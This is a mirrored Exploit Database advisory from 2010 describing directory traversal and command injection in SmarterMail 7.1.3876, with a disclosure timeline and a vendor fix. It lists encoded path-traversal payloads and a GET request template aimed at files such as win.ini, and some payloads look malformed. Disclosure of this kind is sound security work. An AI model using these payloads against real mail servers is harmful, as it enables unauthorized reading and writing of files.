SmarterMail 7.1.3876 – Directory Traversal

• Exploit Database
• 12 阅读

• 作者： sqlhacker
  日期： 2010-09-19
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15048/

• # Note: Fixed by the vendor in version 7.2.3925
  # http://www.smartertools.com/smartermail/releasenotes/v7.aspx
  
  Vendor: smartertools.com SmarterMail 7.x (7.1.3876) | Bug : Directory
  Traversal, OS Command Injection, Other Critcal Vulns
  ########################################################################
  
  # Vendor: smartertools.com SmarterMail 7.x (7.1.3876)
  # Date: 2010-09-12
  # Author : sqlhacker – http://cloudscan.me
  # Thanks to : Burp Suite Pro - engagement tool
  # : FuzzDB
  # Contact : h02332@gmail.com
  # Home : http://cloudscan.me
  # Dork : insite: SmarterMail Enterprise 7.1
  # Bug : Directory Traversal, OS Command Injection, Other Critcal Vulns
  # Tested on : SmarterMail 7.x (7.1.3876) // Windows 2008 /64/R2
  # Vendor Contact - August 14, 2010
  # -Multiple email exchanges with Vendor thru Labor Day 2010
  # - Vendor took no action 9/1/2010
  # - Public Disclosure with Workaround Solution Provided 9-4-2010
  ########################################################################
  Source URL
  http://cloudscan.blogspot.com/2010/09/smarter-stats-533819-file-fuzzing.html
  
  The default installation of SmarterMail is vulnerable to 1 (or more) of the
  file fuzzing types contained within FuzzDB and Burp Suite Pro 1.3.08 as a
  baseline analysis for exploit surface modeling.
  
  Reduced to exploits, Directory Traversal, OS Injection and Execution.
  Initial Exploit Requires user-level privs.
  
  A malicious user seeking to exploit Browser Clients can launch attacks from
  the User Home / Public Web Directory utilizing the SSL Certificate of the
  Host Provider.
  A malicious user seeking to exploit the Host Server can launch attacks as
  Local File Inclusion or Remote File Inclusion and perform Operating System
  Injections and Execution.
  A malicious user can read and write directories, files and perform malicious
  operations due to the default configuration of smartermail.
  
  
  This is reduced to: GET {Vulnerable SmarterMail
  Site}/path/*payload*relative/path/to/target/file/
  ..%255c
  .%5c../..%5c
  /..%c0%9v../
  /..%c0%af../
  /..%255c..%255c
  ../../../../../../win.ini
  ../../../../../../SmarterMail/ExploitShells
  ../../../../../../SmarterMail/{Domain}/{(l)uzername)/PubPayloadDir/logo_25.jpg%../%../somewhere
  to read/write
  A workaround is posted in the Source URL
  http://cloudscan.blogspot.com/2010/09/smarter-stats-533819-file-fuzzing.html